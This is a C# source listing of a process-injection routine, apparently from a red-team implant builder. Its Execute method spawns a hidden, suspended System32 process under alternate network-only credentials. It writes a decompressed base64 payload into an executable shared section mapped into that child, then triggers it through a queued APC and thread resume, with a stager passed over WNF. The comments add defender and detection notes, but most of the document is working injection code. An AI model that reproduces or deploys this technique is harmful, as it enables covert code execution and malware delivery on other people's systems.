/// <summary>
/// Thin managed wrapper over the native <c>CreateProcessWithLogonW</c>: starts
/// <paramref name="path"/> + <paramref name="binary"/> under the supplied account with
/// <c>LogonFlags.NetCredentialsOnly</c> (LOGON_NETCREDENTIALS_ONLY: the credentials are
/// used for outbound network authentication only; the local token is the caller's).
/// Only <c>STARTUPINFO.cb</c> is populated; every other STARTUPINFO field is left at its default.
/// Defender note: the password is held as a plain managed <c>string</c> for the lifetime of the
/// call and beyond (strings are immutable and are not scrubbed), and the wrapper emits no reason
/// on failure (it does not read GetLastError).
/// </summary>
/// <param name="username">Account name, forwarded as lpUsername.</param>
/// <param name="password">Plain-text password, forwarded as lpPassword. Note the wrapper's
/// parameter order (username, password, domain) differs from the native order
/// (username, domain, password); the call below re-orders them correctly.</param>
/// <param name="domain">Domain, forwarded as lpDomain.</param>
/// <param name="path">Directory prefix; concatenated with <paramref name="binary"/> with no
/// separator inserted, and also passed as the new process's current directory.</param>
/// <param name="binary">Executable name appended to <paramref name="path"/>.</param>
/// <param name="arguments">Appended to the command line after a single space.</param>
/// <param name="cf">Process creation flags, forwarded unchanged.</param>
/// <param name="processInformation">Receives the new process/thread handles and ids;
/// the caller is responsible for closing them.</param>
/// <returns><c>true</c> when the native call succeeds, <c>false</c> otherwise.</returns>
public static bool CreateProcessWithLogonW(string username, string password, string domain, string path, string binary, string arguments, Natives.CreationFlags cf, ref Natives.PROCESS_INFORMATION processInformation) {
    Natives.STARTUPINFO startupInfo = new Natives.STARTUPINFO();
    // cb must be set to the structure size or the API rejects the call.
    startupInfo.cb = (uint)Marshal.SizeOf(typeof(Natives.STARTUPINFO));
    // Native order is (user, domain, password); lpApplicationName and lpCommandLine both
    // receive path+binary, with the arguments appended only to the command line.
    if (!Natives.CreateProcessWithLogonW(username, domain, password, Natives.LogonFlags.NetCredentialsOnly, path + binary, path + binary + " " + arguments, cf, 0, path, ref startupInfo, out processInformation)) {
        return(false);
    }
    Console.WriteLine("Process created");
    return(true);
}
/// <summary>
/// Spawns a suspended, windowless child from System32 under alternate (network-only) credentials,
/// copies a decompressed payload into a shared RWX section mapped into both this process and the
/// child, queues the child's primary thread with an APC pointing at the mapped view, writes a
/// stager via <c>WriteWnF</c>, and resumes the thread. <paramref name="args"/> is not used.
/// Detection note for defenders: the observable sequence — CreateProcessWithLogonW with
/// CREATE_SUSPENDED|CREATE_NO_WINDOW, ZwCreateSection/ZwMapViewOfSection with
/// PAGE_EXECUTE_READWRITE into another process, ZwQueueApcThread on that process's initial
/// thread, then ZwResumeThread — is a high-signal telemetry chain, and the fixed log file
/// <c>c:\temp\log.txt</c> is a host artifact. The literal <c>#USERNAME#</c>/<c>#DOMAIN#</c>/
/// <c>#PASSWORD#</c>/<c>#SPAWN#</c> tokens look like build-time template placeholders — TODO confirm;
/// whatever replaces them is embedded in the binary as plain text.
/// <c>nutclr</c>, <c>task</c>, <c>DecompressDLL</c> and <c>WriteWnF</c> are defined outside this listing.
/// </summary>
/// <param name="args">Unused.</param>
static void Execute(string [] args) {
    var startInfo = new Natives.STARTUPINFO();
    Natives.PROCESS_INFORMATION procInfo = new Natives.PROCESS_INFORMATION();
    Natives.LARGE_INTEGER largeinteger = new Natives.LARGE_INTEGER();
    Natives.SYSTEM_INFO info = new Natives.SYSTEM_INFO();
    startInfo.cb = (uint)Marshal.SizeOf(startInfo);
    // pSec/tSec are initialised but never passed to any call below.
    Natives.SECURITY_ATTRIBUTES pSec = new Natives.SECURITY_ATTRIBUTES();
    Natives.SECURITY_ATTRIBUTES tSec = new Natives.SECURITY_ATTRIBUTES();
    pSec.nLength = Marshal.SizeOf(pSec);
    tSec.nLength = Marshal.SizeOf(tSec);
    IntPtr section = IntPtr.Zero;
    uint size = 0;
    IntPtr baseAddr = IntPtr.Zero;
    // viewSize/viewSizeEx start at 0 (size is 0 here); ZwMapViewOfSection fills them in.
    IntPtr viewSize = (IntPtr)size;
    IntPtr soffset = IntPtr.Zero;
    IntPtr baseAddrEx = IntPtr.Zero;
    IntPtr viewSizeEx = (IntPtr)size;
    // hToken, hProcTest and hTokenTest are never assigned; they stay IntPtr.Zero and the
    // CloseHandle calls on them below are no-ops against a null handle.
    IntPtr hToken = IntPtr.Zero;
    IntPtr hProcTest = IntPtr.Zero;
    IntPtr hTokenTest = IntPtr.Zero;
    uint flags = Natives.CreateSuspended | Natives.CreateNoWindow;
    try {
        // Native order: user, domain, password. Child is created suspended and hidden,
        // with System32 as its current directory.
        if (Natives.CreateProcessWithLogonW("#USERNAME#", "#DOMAIN#", "#PASSWORD#", Natives.LogonFlags.NetCredentialsOnly, @"C:\Windows\System32\#SPAWN#", "", flags, (UInt32)0, "C:\\Windows\\System32", ref startInfo, out procInfo)) {
            byte[] payload = DecompressDLL(Convert.FromBase64String(nutclr));
            // Round payload size up to the next page boundary (when the length is already
            // page-aligned this adds one whole extra page).
            Natives.GetSystemInfo(ref info);
            size = info.dwPageSize - (uint)payload.Length % info.dwPageSize + (uint)payload.Length;
            largeinteger.LowPart = size;
            // Create an RWX, commit-backed section in the current process.
            // The NTSTATUS returned into `status` is never inspected anywhere below.
            var status = Natives.ZwCreateSection(ref section, Natives.GenericAll, IntPtr.Zero, ref largeinteger, Natives.PAGE_EXECUTE_READWRITE, Natives.SecCommit, IntPtr.Zero);
            // Map the section into the current process; success is inferred from baseAddr only.
            status = Natives.ZwMapViewOfSection(section, Natives.GetCurrentProcess(), ref baseAddr, IntPtr.Zero, IntPtr.Zero, soffset, ref viewSize, 1, 0, Natives.PAGE_EXECUTE_READWRITE);
            if (baseAddr != IntPtr.Zero) {
                // Copy the payload into the locally mapped view of the section.
                Marshal.Copy(payload, 0, baseAddr, payload.Length);
                // Map the same section into the child; success is inferred from the out values only.
                status = Natives.ZwMapViewOfSection(section, procInfo.hProcess, ref baseAddrEx, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, ref viewSizeEx, 1, 0, Natives.PAGE_EXECUTE_READWRITE);
                if (baseAddrEx != IntPtr.Zero && viewSizeEx != IntPtr.Zero) {
                    // Drop the local view; the section object itself is never closed.
                    Natives.ZwUnmapViewOfSection(Natives.GetCurrentProcess(), baseAddr);
                    // Queue an APC on the child's primary (still suspended) thread with the
                    // remote view address as the routine. ptrq is never checked.
                    IntPtr th = procInfo.hThread;
                    IntPtr ptrq = Natives.ZwQueueApcThread(th, baseAddrEx, IntPtr.Zero);
                    // NOTE(review): thread information class 1 with a null, zero-length buffer —
                    // intent unclear; confirm against THREADINFOCLASS. Return value not checked.
                    Natives.ZwSetInformationThread(th, 1, IntPtr.Zero, 0);
                    // Before resuming the thread the stager is published via WNF so the spawned
                    // process can read it from another session (WriteWnF/task defined elsewhere).
                    WriteWnF(task);
                    // Resume the child; the APC runs when the thread enters an alertable state.
                    // rest/outsupn are never checked.
                    int rest = Natives.ZwResumeThread(th, out ulong outsupn);
                } else {
                    Console.WriteLine("[x] Error mapping remote section");
                    File.WriteAllText(@"c:\temp\log.txt", "[x] Error mapping remote section");
                }
            } else {
                Console.WriteLine("[x] Error mapping section to current process");
                File.WriteAllText(@"c:\temp\log.txt", "[x] Error mapping section to current process");
            }
            Natives.CloseHandle(procInfo.hThread);
            Natives.CloseHandle(procInfo.hProcess);
            // Both handles are still IntPtr.Zero here (see declarations above).
            Natives.CloseHandle(hProcTest);
            Natives.CloseHandle(hTokenTest);
        } else {
            Console.WriteLine("[x] Error creating process");
            File.WriteAllText(@"c:\temp\log.txt", "[x] Error creating process " + Natives.GetLastError());
        }
        // Repeated close of the same never-assigned (zero) handles.
        Natives.CloseHandle(hProcTest);
        Natives.CloseHandle(hTokenTest);
    } catch (Exception e) {
        // Any managed exception is reported to the console and overwrites the same log file.
        Console.WriteLine("[x] Generic error");
        File.WriteAllText(@"c:\temp\log.txt", "[x] Generic error " + e.Message + " " + e.StackTrace);
    }
}